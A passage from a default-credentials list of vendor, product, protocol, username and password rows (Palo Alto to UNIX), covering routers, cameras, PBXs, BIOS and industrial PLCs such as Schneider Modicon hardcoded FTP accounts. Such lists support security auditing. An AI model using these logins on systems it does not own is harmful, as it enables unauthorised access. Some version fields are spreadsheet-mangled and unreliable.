-Palo Alto Networks,GlobalProtect Gateway,ANY,HTTP/CLI,admin,admin,Administrator,https://docs.paloaltonetworks.com/pan-os/9-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html -Panasonic,CF-28,,Multi,,,Admin, -Panasonic,CF-45,,Multi,,,Admin, -Panasonic,IP Camera system,,HTTP,admin,12345,, -Panasonic,IP Camera system,,HTTP,admin1,password,, -Panasonic,PBX TDA 100/200/400,all,Console,,1234,Admin, -Panasonic,kx-td816,,,,1234,Admin, -Pandatel,EMUX,all,,admin,admin,, -Pansonic,KXTD1232,,Multi,admin,1234,Admin, -Patton,RAS,2,,monitor,monitor,, -Pelco,IP Camera system,,HTTP,admin,admin,, -PentaSafe,VigilEnt Security Manager,3,VigilEnt Security Manager Console,PSEAdmin,$secure$,Admin, -Pentagram,Cerberus ADSL modem + router,,HTTP,admin,password,Admin, -Pentaoffice,Sat Router,,Telnet,,pento,Admin, -Perle,CS9000,any,Console,admin,superuser,Admin, -Philips,Praesideo PA System,Any,Multi,admin,admin,Admin, -Phoenix v1.14,Phoenix v1.14,,Multi,Administrator,admin,Admin, -Phoenix,4,6.0.2,Multi,,admin,Admin, -Phoenix,bios,,Multi,,,Admin, -Phoenix,dell,,Multi,,admin,Admin, -PiXORD,IP Camera system,,HTTP,admin,admin,, -PiXORD,IP Camera system,,HTTP,root,pass,, -PingTel,Xpressa,1.2.5-1.2.7.4,,admin,,Admin, -Pirelli,AGE ADSL Router,,Multi,admin,microbusiness,Admin, -Pirelli,AGE ADSL Router,,Multi,user,password,User, -Pirelli,DRG A125G,4.5.3,,admin,admin,Admin, -Pirelli,Pirelli AGE-SB,,HTTP,admin,smallbusiness,Admin, -Pirelli,Pirelli Router,,Multi,admin,microbusiness,Admin, -Pirelli,Pirelli Router,,Multi,admin,mu,Admin, -Pirelli,Pirelli Router,,Multi,user,password,Admin, -PlainTree,Waveswitch 100,,,,default.password,Admin, -Planet,ADE-4000,,Multi,admin,epicrouter,Admin, -Planet,ADE-4110,,HTTP,admin,epicrouter,Admin, -Planet,WAP 4000,,Multi,admin,admin,Admin,Default IP is 192.168.1.1 -Planet,WAP-1900/1950/2000,2.5.0,Multi,,default,Admin, -Planet,WAP-1900/1950/2000,2/5/2000,Multi,,default,Admin, 
-Planet,WAP-1900/1950/2000,36561,Multi,,default,Admin, -Planet,XRT-401D,,HTTP,admin,1234,Admin, -Planex,BRL-04UR,,Multi,admin,0,Admin, -Pollsafe,Pollsafe,,MODEM,SMDR,SECONDARY,, -Polycom,SoundPoint IP Phones,,HTTP,Polycom,456,Admin,username is case sensitive -Polycom,Soundpoint VoIP phones,,HTTP,Polycom,SpIp,User, -Polycom,ViewStation 4000,3.5,Multi,,admin,Admin, -Polycom,Viewstation,,Telnet,administrator,,Admin, -Polycom,iPower 9000,,Multi,,,Admin, -PostgreSQL,PostgreSQL,,Any,postgres,,Admin,(or sometimes the password may default to `postgres`) -Prestigio,Nobile,156,Multi,,,Admin, -Prime,PrimeOS,,Multi,dos,dos,User, -Prime,PrimeOS,,Multi,guest,guest,User, -Prime,PrimeOS,,Multi,guest1,guest,User, -Prime,PrimeOS,,Multi,maint,maint,User, -Prime,PrimeOS,,Multi,netlink,netlink,User, -Prime,PrimeOS,,Multi,prime,primeos,User, -Prime,PrimeOS,,Multi,primenet,primeos,User, -Prime,PrimeOS,,Multi,primeos,primeos,User, -Prime,PrimeOS,,Multi,primos_cs,prime,User, -Prime,PrimeOS,,Multi,system,system,Admin, -Prime,PrimeOS,,Multi,test,test,User, -Prolink,H9000 Series,,HTTP,admin,password,Admin, -Promise,NS4300N NAS,,Shell,engmode,hawk201,Admin, -Proxim,Orinoco 600/2000,All,HTTP,,,Admin,WLAN accesspoint -Psion Teklogix,9150,,HTTP,support,h179350,Admin, -Psionteklogix,9160,1,HTTP,admin,admin,Admin, -Pyramid Computer,BenHur,all,HTTP,admin,admin,Admin, -QDI,PC BIOS,,Console,,QDI,Admin, -QLogic,SANbox 5602 Fibre Channel Switch,,Multi,admin,password,Admin, -QLogic,SANbox 5602 Fibre Channel Switch,,Multi,images,images,User, -QVIS,IP Camera system,,HTTP,admin,1234,, -Quantex,PC BIOS,,Console,,teX1,Admin, -Quantum,File Servers,Most,HTTP,,,User, -Quintum Technologies Inc.,Tenor Series,all,Multi,admin,admin,Admin, -RM,RM Connect,,Multi,RMUser1,password,, -RM,RM Connect,,Multi,admin,rmnetlm,, -RM,RM Connect,,Multi,admin2,changeme,, -RM,RM Connect,,Multi,adminstrator,changeme,, -RM,RM Connect,,Multi,deskalt,password,, -RM,RM Connect,,Multi,deskman,changeme,, -RM,RM 
Connect,,Multi,desknorm,password,, -RM,RM Connect,,Multi,deskres,password,, -RM,RM Connect,,Multi,guest,,, -RM,RM Connect,,Multi,replicator,replicator,, -RM,RM Connect,,Multi,setup,changeme,, -RM,RM Connect,,Multi,teacher,password,, -RM,RM Connect,,Multi,temp1,password,, -RM,RM Connect,,Multi,topicalt,password,, -RM,RM Connect,,Multi,topicnorm,password,, -RM,RM Connect,,Multi,topicres,password,, -RM,Server BIOS,,Console,,RM,, -ROLM,phones/phone mail,,,,111#,, -Radware,AppDirect,,,radware,radware,Admin, -Radware,AppXcel,,,radware,radware,Admin, -Radware,Linkproof,,ssh,lp,lp,Admin, -Radware,Linkproof,3.73.03,Multi,radware,radware,Admin, -Raidzone,raid arrays,,,,raidzone,, -Ramp Networks,WebRamp,,,wradmin,trancell,, -Rapid7 Inc,Metasploitable,2.0.0,Linux User (e.g. SSH & SFTP),msfadmin,msfadmin,root, -RapidStream,RapidStream Appliances,,Multi,rsadmin,(null),Admin, -Raritan,KVM Switches,,,admin,raritan,Admin, -Raspberry Pi Foundation,Raspberry Pi OS,ANY,Linux User (e.g. SSH & SFTP),pi,raspberry,sudo access,https://www.raspberrypi.org/documentation/linux/usage/users.md -RedHat,Piranha,6.2,Console,,Q,Interface, -RedHat,Redhat 6.2,,HTTP,piranha,piranha,User, -RedHat,Redhat 6.2,,HTTP,piranha,q,User, -Reda,,,HTTP,,,User, -Redemo,da,,HTTP,admin,,Admin, -Redhat,Redhat 6.2,,HTTP,piranha,piranha,, -Remedy,Any,Any,,Demo,,, -Remedy,Remedy,,Multi,demos,,User, -Replicom,ProxyView,,NetBIOS,Administrator,Pvremote,Admin, -Research,BIOS,,Console,,Col2ogro2,Admin, -Research,PC BIOS,,Console,,Col2ogro2,Admin, -Resumix,Resumix,,,root,resumix,, -Ricoh,AP410N,1.13,HTTP,admin,,Admin, -Ricoh,Aficio 1013F,,HTTP,,sysadm,Admin, -Ricoh,Aficio 1018d,,HTTP,,sysadm,Admin, -Ricoh,Aficio 2020D,,HTTP,admin,password,Admin, -Ricoh,Aficio 2228c,,Multi,sysadmin,password,Admin,Webpage admin -Ricoh,Aficio 2232C,,Telnet,,password,Admin, -Ricoh,Aficio 551,,Multi,,sysadm,Admin, -Ricoh,Aficio AP3800C,2.17,HTTP,,password,Admin,alternative to sysadmin and Admin -Ricoh,Aficio MP 161L,( Printer MP 161L ),,( - Not 
required),sysadm,Administration, -Ricoh,Aficio MP 161L,( Printer MP 161L ),,,sysadm,Administration, -Ricoh,Aficio,2016,,,password,all, -Ricoh,Aficio,AP3800C,HTTP,sysadmin,password,Admin, -Ricoh,Ricoh,Aficio MP 3500 1.0,Multi,admin,,Admin,Nabil OUCHN -Rizen,WebGUI,,,Admin,123qwe,Administrator,http://freshmeat.net/projects/webgui/ -RoamAbout,RoamAbout R2 Wireless Access Platform,,Multi,admin,password,Admin, -RoamAbout,RoamAbout R2 Wireless,,Multi,admin,password,Admin, -Rodopi,Rodopi billing software (AbacBill) sql database,,,rodopi,rodopi,, -Roxio,Aesy cd,,Multi,,,Admin, -Ruckus Wireless,M510,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,MediaFlex 2111,,HTTP,admin,password,Administrator,Default IP Address: 192.168.0.254 -Ruckus Wireless,MediaFlex 2825,,HTTP,admin,password,Administrator,Default IP Address: 192.168.20.1 -Ruckus Wireless,MediaFlex 7111,,HTTP,admin,password,Administrator,Default IP Address: 192.168.2.254 -Ruckus Wireless,MediaFlex 7211,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.30.1 -Ruckus Wireless,MediaFlex 7811,,HTTP,admin,password,Administrator,Default IP Address: 192.168.2.1 -Ruckus Wireless,R320,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,R500,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,R750,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,ZoneFlex 2942,,HTTP,admin,password,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,ZoneFlex 7055,,HTTP,admin or super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,ZoneFlex 7321,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,ZoneFlex 7343,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,ZoneFlex 7351,,HTTP,super,sp-admin,Administrator, -Ruckus Wireless,ZoneFlex 7352,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 
-Ruckus Wireless,ZoneFlex 7363,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,ZoneFlex 7372,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,ZoneFlex 7441,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,ZoneFlex 7762,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,ZoneFlex 7962,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,ZoneFlex R310,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,ZoneFlex T300,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -S2400,Toshiba,,HTTP,Administrator,admin,Admin, -SAF Tehnika,CFQ series modems,,,administrator,d1scovery,Admin, -SAF Tehnika,CFQ series modems,,,integrator,p1nacate,Integrator, -SAF Tehnika,CFQ series modems,,,monitor,monitor,Monitor, -SAF Tehnika,CFQ series modems,,,operator,col1ma,Operator, -SAGEM,FAST 1400,,Multi,admin,epicrouter,Admin, -SAMSUNG,Samsung AHT-E300 Multi,ANY,HTTP,admin,sec00000,admin,Default router IP: 192.168.1.1 -SANS Institute,SIFT Workstation,ANY,Linux User (e.g. 
SSH & SFTP),sansforensics,forensics,sudo access, -SAP,SAP,,SAP client,DDIC,19920706,SAP internal; Mandant 001, -SAP,SAP,,SAP client,SAP*,PASS,SAP internal; all Mandants, -SAP,SAP,,SAP client,SAPCPIC,ADMIN,Admin, -SGI,IRIX,ALL,,EZsetup,,, -SGI,IRIX,ALL,,demos,,, -SGI,all,all,,root,,, -SIEMENS,SE515,,HTTP,admin,,Admin, -SKY,FEBRUARY 2016 MODEL,,,admin,sky,, -SMC,2804wr,,HTTP,,smcadmin,Admin, -SMC,7204BRA,,Multi,smc,smcadmin,Admin, -SMC,7401BRA,1,HTTP,admin,barricade,Admin, -SMC,7401BRA,2,HTTP,smc,smcadmin,Admin, -SMC,Barricade 7004 AWBR,,Multi,admin,,Admin,192.168.123.254 (WiFi AP) -SMC,Barricade,,,,admin,, -SMC,Barricade7204BRB,,HTTP,admin,smcadmin,Admin, -SMC,Modem/Router,,HTTP,cusadmin,highspeed,Customer Admin,Comcast Commercial High Speed Modem model number 8013WG -SMC,Router,All,HTTP,admin,admin,Admin, -SMC,Router/Modem,BR7401,Multi,admin,barricade,Admin, -SMC,SMB2804WBR,V2,Multi,Administrator,smcadmin,Admin, -SMC,SMC broadband router,,HTTP,admin,admin,Admin, -SMC,SMC2804WBR,v.1,HTTP,,smcadmin,Admin, -SMC,SMC7004VBR,,HTTP,,smcadmin,Admin, -SMC,SMC8013WG-CCR,2.11.19-1d,HTTP,mso,w0rkplac3rul3s,Admin,Comcast Business Gateway w the int LAN IP 10.1.10.1 and login cusadmin highspeed -SMC,SMCWBR14-G,,HTTP,,smcadmin,Admin,DeFaults:IP Address: 192.168.2.1 - Subnet Mask: 255.255.255.0 -SMC,SMCWBR14-G,,HTTP,,smcadmin,Admin,mentioned password (no passwd) -SMC,SMCWBR14-G,,HTTP,,smcadmin,Admin,mentioned password (no passwd) on your webpage is wrong -SMC,SMCWBR14-G,SMCWBR14-G,HTTP,,smcadmin,Admin, -SMC,WiFi Router,All,HTTP,,smcadmin,Admin,model #2804WBRP-G -SMC,smc7904wbrb,,Multi,,smcadmin,Admin, -SOPHIA (Schweiz) AG,Protector,,HTTPS,admin,Protector,Admin, -SOPHIA (Schweiz) AG,Protector,,SSH,root,root,Admin, -SOPHIA (Schweiz),Protector,,HTTPS,admin,Protector,Admin, -SOPHIA (Schweiz),Protector,,SSH,root,root,Admin, -SSA,BPCS,Up to 5.02,Multi,SSA,SSA,Admin,rarely changed/used for upgrades-patches -SWEEX,,,,sweex,mysweex,Admin, -Sagem,F@st 1200 (Fast 
1200),,Telnet,root,1234,User,root/1234 -Sagem,Fast 3504 v2,,,Menara,Menara,admin,moroccan internet provider’s router -Sagem,Livebox,,Multi,admin,admin,Admin, -Samba,SWAT Package,Linux,,Any Local User,Local User password,, -Samsung,IP Camera system,,HTTP,admin,4321 / 1111111,, -Samsung,IP Camera system,,HTTP,root,4321 / admin,, -Samsung,MagicLAN SWL-3500RG,2.15,HTTP,public,public,Admin,def. WEP keys: 0123456789 1518896203 -Samsung,inforanger,,Multi,,,Admin, -Sanyo,IP Camera system,,HTTP,admin,admin,, -Schneider,BMENOC301,,HTTP,admin,factorycast,Administrator,https://www.se.com/in/en/faqs/FA321581/ -Schneider,BMENOC311,,HTTP,admin,factorycast,Administrator,https://www.se.com/in/en/faqs/FA321581/ -Schneider,BMENOC321,,HTTP,admin,factorycast,Administrator,https://www.se.com/in/en/faqs/FA321581/ -Schneider,Modicon M340,,FTP,fdrusers,sresurdf,,https://www.tenable.com/security/research/tra-2018-38 -Schneider,Modicon M340,,FTP,fwupgrade,FaAmU5p2F~,,https://www.tenable.com/security/research/tra-2018-38 -Schneider,Modicon M340,,FTP,loki,ZfTljublsx,,https://www.tenable.com/security/research/tra-2018-38 -Schneider,Modicon M340,,FTP,sysdiag,factorycast@schneider,,https://www.tenable.com/security/research/tra-2018-38 -Schneider,Modicon M340,,HTTP,USER,USER,,https://download.schneider-electric.com/files?p_enDocType=User+guide&p_File_Name=35015192_K01_000_08.pdf&p_Doc_Ref=35015192K01000 -Schneider,Modicon M340,,HTTP,USER,USERUSER,,https://download.schneider-electric.com/files?p_enDocType=User+guide&p_File_Name=35015192_K01_000_08.pdf&p_Doc_Ref=35015192K01000 -Schneider,Premium,,FTP,sysdiag,factorycast@schneider,, -Schneider,Premium,,HTTP,USER,USER,, -Scientific Atlanta,DPX2100,Comcast-supplied,HTTP,admin,w2402,diagnostics page,192.168.100.1 -Scylla,ScyllaDB,,Any,cassandra,cassandra,Admin, -Secure Computing,Webwasher,all,HTTP,admin,,Admin, -Securicor3NET,Cezzanne,any,,manager,friend,, -Securicor3NET,Money,,,manager,friend,Admin, -Semaphore,PICK O/S,,,DESQUETOP,,, -Semaphore,PICK 
O/S,,,DSA,,, -Sempre,54M Wireless Router,V 1.00,,admin,admin,, -Senao,2611CB3+D (802.11b Wireless AP),,HTTP,admin,,Admin,Default IP: 192.168.1.1 -Senao,2611CB3+D (802.11b,,HTTP,admin,,Admin,Default IP: 192.168.1.1 -Sentry360,IP Camera system,,HTTP,Admin,1234,, -Sercom,IP806GA,,HTTP,admin,admin,Admin, -Sercom,IP806GB,,HTTP,admin,admin,Admin, -Server Technology,Sentry Remote Power Manager,,Multi,ADMN,admn,Admin,Telnet port 2001 -Server Technology,Sentry Remote Power Manager,,Multi,GEN1,gen1,view/control,Telnet port 2001 -Server Technology,Sentry Remote Power Manager,,Multi,GEN2,gen2,view/control,Telnet port 2001 -Sharp,AL-1655CS,,HTTP,admin,Sharp,Admin, -Sharp,AR-M155,,HTTP,admin,Sharp,Admin,Note the Capital S -Sharp,AR-M237,,,admin,Sharp,Admin, -Sharp,AR-M237,,,admin,Sharp,Admin,pass case-sensitive -Sharp,AR-M355N,,HTTP,admin,Sharp,Admin, -Sharp,MX-3501n,,HTTP,Administrator,admin,Admin, -Sharp,MX-5500,,HTTP,admin,admin,Admin,Different to other sharp units -Shina,LANRover,,,root,,Admin, -Shiva,AccessPort,Any,,hello,hello,, -Shiva,Integrator,150/200/500,Multi,admin,hello,Admin, -Shoretel,ALL,,HTTP,admin,changeme,Admin, -Shuttle,PC BIOS,,,,Spacve,Admin, -Siemens Nixdorf,BIOS,,Console,,SKY_FOX,Admin, -Siemens Nixdorf,PC BIOS,,Console,,SKY_FOX,Admin, -Siemens Pro C5,Siemens,,Multi,,,Admin, -Siemens,5940 T1E1 Router,5940-001 v6.0.180-2,Telnet,superuser,admin,Admin, -Siemens,Gigaset,All,Multi,,0,Admin, -Siemens,Hicom 100E PBX,,,31994,31994,, -Siemens,Hipath,3300-3750,Custom program,31994,31994,Admin, -Siemens,PhoneMail,,,poll,poll,, -Siemens,PhoneMail,,,poll,tech,, -Siemens,PhoneMail,,,sysadmin,sysadmin,, -Siemens,PhoneMail,,,system,field,, -Siemens,PhoneMail,,,tech,tech,, -Siemens,ROLM PBX,,,admin,pwp,, -Siemens,ROLM PBX,,,eng,engineer,, -Siemens,ROLM PBX,,,op,op,, -Siemens,ROLM PBX,,,op,operator,, -Siemens,ROLM PBX,,,su,super,, -Siemens,S7-1200,,HTTP,admin,,,https://www.192-168-1-1-ip.co/router/siemens/s7-1200-s7-1500/17618/ 
-Siemens,SE560dsl,,Multi,admin,admin,Admin,Also has an account with: user/user -Siemens,Simatic S7-1200 / S7-1500,PLC,HTTP,admin,,, -Siemens,SpeedStream 4100,,HTTP,admin,hagpolm1,Admin,DSL Modem and Router -Siemens,Speedstream SS2614,Hardware V. 01,HTTP,,admin,Admin, -Sigma,Sigmacoma IPshare,Sigmacom router v1.0,HTTP,admin,admin,Admin,effes2004@gmail.com -Signamax,065-7726S,,Multi,admin,admin,Admin,Switch -Siips,Trojan,8974202,Multi,Administrator,ganteng,Admin, -Silex Technology,Generic USB Device Servers,,multi,root,,administrator, -Silex Technology,SX-100,,multi,root,access,administrator, -Silex Technology,SX-200,,multi,root,access,administrator, -Silex Technology,SX-2933-S03,,multi,root,access,administrator, -Silex Technology,SX-500,,multi,root,access,administrator, -Silex Technology,SX-600,,multi,root,access,administrator, -Silvercrest,WR-6640Sg,,HTTP,admin,admin,Admin, -Sitecom,All WiFi routers,,Multi,,sitecom,Admin, -Sitecom,WL-0xx up to WL-17x,all,Multi,admin,admin,Admin,often on port 88 -Sitecom,WL-108,,,admin,password,admin, -SmartSwitch,Router 250 ssr2500,v3.0.9,Multi,admin,,Admin, -Snapgear,Pro,Lite,and SOHO,1.79,Multi,root,default -Software,,,,,,,EVMAdminGuide.pdf -Solution 6,Viztopia Accounts,,Multi,aaa,often blank,Admin, -SonarSource,SonarQube,,HTTP,admin,admin,, -Sonic-X,SonicAnime,on,Telnet,root,admin,Admin,1.01E+14 -Sonic-X,SonicAnime,on,Telnet,root,admin,Admin,101000000000000 -SonicWALL,ALL,ALL,HTTP,admin,password,Admin, -Sony,IP Camera system,,HTTP,admin,1234,, -Sony,IP Camera system,,HTTP,admin,admin,, -Sorenson,SR-200,,HTTP,,admin,Admin, -Sparklan,Wx-6215 D and G,,HTTP,admin,admin,Admin, -Speco,IP Camera system,,HTTP,admin,admin,, -Speco,IP Camera system,,HTTP,root,root,, -Spectra Logic,64000 Gator,,Multi,administrator,,Admin, -Spectra Logic,64000 Gator,,Multi,operator,,User, -SpeedStream 5200-Serie,SpeedStream,,Telnet,Administrator,admin,Admin, -SpeedStream,5660,,Telnet,,adminttd,Admin, 
-SpeedStream,SpeedStream,,Telnet,Administrator,admin,Admin, -SpeedXess,HASE-120,,Multi,,speedxess,Admin, -Speedstream,5667,R4.0.1,HTTP,,admin,Admin, -Speedstream,5861 SMT Router,,Multi,admin,admin,Admin, -Speedstream,5871 IDSL Router,,Multi,admin,admin,Admin, -Speedstream,DSL,,Multi,admin,admin,Admin, -Speedstream,Router 250 ssr250,,Multi,admin,admin,Admin, -Sphairon,(Versatel WLAN-Router),,Multi,admin,passwort,Admin, -Spike,CPE,,Console,enable,,Admin, -Ssangyoung,SR2501,,,,2501,, -StarDot,IP Camera system,,HTTP,admin,admin,, -Starvedia,IP Camera system,,HTTP,admin,,, -Sun Microsystems,ILOM of X4100,1,HTTP,root,changeme,Admin, -Sun,,Solaris,,,,, -Sun,Cobalt,,HTTP,admin,admin,Admin,submit by Nabil Ouchn -Sun,JavaWebServer,1.x 2.x,AdminSrv,admin,admin,Admin, -Sun,SunScreen,3.1 Lite,TCP 3852,admin,admin,Admin,Use a Java enabled web browser on port 3852 -SuperMicro,PC BIOS,,Console,,ksdjfg934t,Admin, -Swissvoice,IP 10S,,Telnet,target,password,Admin, -Syabas Technology,Popcorn Hour A-110,all,,ftpuser,1234,admin, -Syabas Technology,Popcorn Hour A-110,all,,nmt,1234,admin, -Syabas Technology,Popcorn Hour C-200,all,,nmt,1234,admin, -Sybase,Adaptive Server Enterprise,11.x 12.x,Multi,sa,,SA and SSO roles, -Sybase,EAServer,,HTTP,jagadmin,,Admin,Source : Manufactor documentation -Symantec,NAV CORP / ALL,,HTTP,admin,symantec,Admin, -Symantec,Norton AntiVirus Corp. 
Edition,7.5,Console,,admin,, -Symantec,Norton Antivirus Corporate Edition,7.5,Console,,admin,Admin, -Symantec,pcanywhere,,Console,Administrator,,Admin, -Symbol,AP-2412,,Multi,,Symbol,Admin,2Mbps FH AccessPoint -Symbol,AP-3020,,Multi,,Symbol,Admin,2Mbps FH AccessPoint -Symbol,AP-4111,,Multi,,Symbol,Admin,11Mbps DS AccessPoint -Symbol,AP-4121,,Multi,,Symbol,Admin,11Mbps DS AccessPoint -Symbol,AP-4131,,Multi,,Symbol,Admin,11Mbps DS AccessPoint -Symbol,CB3000,A1,HTTPS,admin,symbol,Admin,Default IP 10.10.1.1 -Symbol,Spectrum,series 4100-4121,HTTP,,Symbol,Admin,Access Point Wireless -Symmetricom,NTS-200,All,,guest,truetime,guest,Symmetricom NTP Network Appliance -Symmetricom,NTS-200,All,,operator,mercury,Admin,Symmetricom NTP Network Appliance -SysKonnect,6616,,,default.password,,Admin, -SysMaster,M10,,HTTP,admin,12345,Admin, -System/32,VOS,,Multi,install,secret,Admin, -T com,sinus,1054dsl,,veda,12871,, -T-Com,Speedport 503V,any,,,123456,, -T-Com,Speedport Router Family,all,HTTP,,0,Admin,works with nearly all routers of the speedport family -T-Com,Speedport W701V,any,,,0,admin, -T-Com,Speedport W900V,any,,,0,admin, -T-Com,Speedport,any,,,0,admin,192.168.2.1 | http://Speedport.ip -T-Comfort,Routers,,HTTP,Administrator,,Admin, -TANDBERG,TANDBERG,8000,Multi,,TANDBERG,Admin,http://www.tandberg.net/collateral/user_manuals/TANDBERG_8000_UserMan.pdf -TMC,PC BIOS,,Console,,BIGO,Admin, -TP-LINK,All Routers,ANY,HTTP,admin,admin,Router Control Access[Admin for that Router],Default Router IP: 192.168.0.1 -TVT System,Expresse G5 DS1 Module,,Multi,,enter,Admin, -TVT System,Expresse G5,,Multi,craft,,Admin, -Tandberg Data,DLT8000 Autoloader 10x,,Console,,10023,Maintenance, -Tandberg,6000MXP,,Multi,Admin,,Admin, -Tandem,TACL,,Multi,super.super,,Admin, -Tandem,TACL,,Multi,super.super,master,Admin, -Team Xodus,XeniumOS,2.3,FTP,xbox,xbox,Admin, -Technicolors,All Routers,ANY,HTTP,admin,admin,Administrator,Default Router IP: 192.168.1.1 -Tekelec,Eagle STP,,,eagle,eagle,Admin, 
-Teklogix,Accesspoint,,Multi,Administrator,,Admin, -Telco Systems,Edge Link 100,,Console,telco,telco,telco, -Telebit,NetBlazer,3.*,,setup/snmp,setup/nopassword,Admin, -Teledat,Routers,,HTTP,admin,1234,Admin, -Teletronics,WL-CPE-Router,3/5/2002,HTTPS,admin,1234,Admin, -Teletronics,WL-CPE-Router,37320,HTTPS,admin,1234,Admin, -Telewell,TW-EA200,,Multi,admin,password,Admin, -Telewell,TW-EA501,v1,Multi,admin,admin,Admin, -Telindus,1124,,HTTP,,,Admin, -Telindus,SHDSL1421,yes,HTTP,admin,admin,Admin, -Tellabs,7120,,Multi,root,admin_1,Admin,telnet on port 3083 -Tellabs,Titan 5500,FP 6.x,Multi,tellabs,tellabs#1,Admin, -Telus,Telephony Services,,Multi,(created),telus00,User,year 2000 passwords -Tenda,All Routers,ANY,HTTP,admin,admin,Router Admin Control Access,Default Router IP: 192.168.0.1 -Terayon,TeraLink 1000 Controller,,,user,password,, -Terayon,TeraLink Getaway / 1000 Controller,,,user,password,User, -Terayon,TeraLink Getaway,,,user,password,, -Terayon,TeraLink,6.29,,admin,nms,Admin, -Terayon,Unknown,Comcast-supplied,HTTP,,,diagnostics page,192.168.100.1/diagnostics_page.html -TextPortal,TextPortal,0.8,HTTP,god2,12345,Admin, -The qBittorrent project,qBittorrent Web UI,ANY,HTTP,admin,adminadmin,Administrator,https://github.com/qbittorrent/qBittorrent/blob/master/doc/qbittorrent-nox.1.md#description -Thomson,SpeedTouch AP,180,HTTP,,admin,Admin,SSID : SpeedTouch180 -Thomson,TCW-710,,Multi,,admin,Admin,ono -Thomson,Wireless Cable Gateway,DCW725,HTTP,,admin,Admin,SSID : THOMSON -Tiara,1400,3.x,Console,tiara,tiaranet,Admin,also known as Tasman Networks routers -Tiara,Tiara,,,tiara,tiaranet,, -Tiny,PC BIOS,,Console,,Tiny,Admin, -Titbas,,SCO,,haasadm,lucy99,Admin, -TopLayer,AppSwitch 2500,,,siteadmin,toplayer,Admin, -Topcom,Skyr@cer Pro AP 554,1.93,HTTP,admin,admin,Admin,Wireless Access Point -Topcom,Wireless Webr@cer 1154+ PSTN (Annex A),V 0.01.06,HTTP,admin,admin,Admin,WPA-PSK implemented -Topcom,Wireless Webr@cer 1154+ PSTN (Annex A),V 0.01.09,HTTP,admin,admin,Admin,Improved 
wireless stability -Topcom,Wireless Webr@cer 1154+ PSTN (Annex A),V 4.00.0,HTTP,admin,admin,Admin,G+ mode (125Mbps) integration -Topcom,Wireless Webr@cer 1154+,V 0.01.06,HTTP,admin,admin,Admin,WPA-PSK implemented -Topcom,Wireless Webr@cer 1154+,V 0.01.09,HTTP,admin,admin,Admin,Improved wireless stability -Topcom,Wireless Webr@cer 1154+,V 4.00.0,HTTP,admin,admin,Admin,G+ mode (125Mbps) integration -Toshiba,E-Studio 3511c,,HTTP,Admin,123456,Admin,Multifunction Printer/Copier/ -Toshiba,E-Studio 3511c,,HTTP,Admin,123456,Admin,Multifunction Printer/Copier/Scanner/Fax -Toshiba,E-Studio 4511c,,HTTP,admin,123456,Admin, -Toshiba,IP Camera system,,HTTP,root,ikwb,, -Toshiba,Most e-Studio copiers,,,admin,123456,Admin, -Toshiba,PC BIOS,,Console,,Toshiba,Admin, -Toshiba,PC BIOS,,Console,,toshy99,Admin, -Toshiba,PC BIOS,,console,,toshy99,, -Toshiba,Tecra 8100,2.3,Multi,,admin,Admin, -Toshiba,laptop,,Multi,Administrator,,Admin, -Toshiba,satellite 1800-s204,,HTTP,,,Admin, -Toshiba,satellite pro 4310,,Multi,,,Admin, -TrendMicro,ISVW (VirusWall),any,,admin,admin,, -TrendMicro,InterScan 7.0,,HTTP,admin,imss7.0,Admin, -TrendNET,TEW-435BRM,1,HTTP,admin,password,Admin, -Trendnet,IP Camera system,,HTTP,admin,admin,, -Trintech,eAcquirer App/Data Servers,,,t3admin,Trintech,Admin, -Troy,ExtendNet 100zx,,Multi,admin,extendnet,Admin, -Troy,ExtendNet 100zx,,Multi,admin,extendnet,Admin,dizphunKt -Tsurugi Linux project,Tsurugi Linux,ANY,Linux User (e.g. SSH & SFTP),root,,sudo access, -Tumbleweed,Message Management System,4.3-4.6,,sa,,Admin, -U.S. Robotics,SureConnect 9003 ADSL Ethernet/USB Router,,Multi,root,12345,Admin, -U.S. Robotics,SureConnect 9003 ADSL,,Multi,root,12345,Admin, -U.S. Robotics,SureConnect 9105 ADSL 4-Port Router,,HTTP,admin,admin,Admin, -U.S. 
Robotics,SureConnect 9105 ADSL,,HTTP,admin,admin,Admin, -UDP,IP Camera system,,HTTP,root,unknown,, -UNEX,Routers,,HTTP,,password,Admin, -UNIX,Generic,,Multi,adm,adm,Admin, -UNIX,Generic,,Multi,admin,admin,User, -UNIX,Generic,,Multi,administrator,,User, -UNIX,Generic,,Multi,bbs,bbs,User, -UNIX,Generic,,Multi,bin,sys,Admin, -UNIX,Generic,,Multi,checkfsys,checkfsys,User, -UNIX,Generic,,Multi,checksys,checksys,User, -UNIX,Generic,,Multi,daemon,,User, -UNIX,Generic,,Multi,demo,,User, -UNIX,Generic,,Multi,demos,,User, -UNIX,Generic,,Multi,dni,dni,User, -UNIX,Generic,,Multi,fal,fal,User, -UNIX,Generic,,Multi,fax,fax,User, -UNIX,Generic,,Multi,ftp,ftp,User, -UNIX,Generic,,Multi,games,,User, -UNIX,Generic,,Multi,gropher,,User, -UNIX,Generic,,Multi,guest,guestgue,User, -UNIX,Generic,,Multi,halt,halt,User, -UNIX,Generic,,Multi,informix,informix,User, -UNIX,Generic,,Multi,lp,lineprin,User, -UNIX,Generic,,Multi,lp,lp,User, 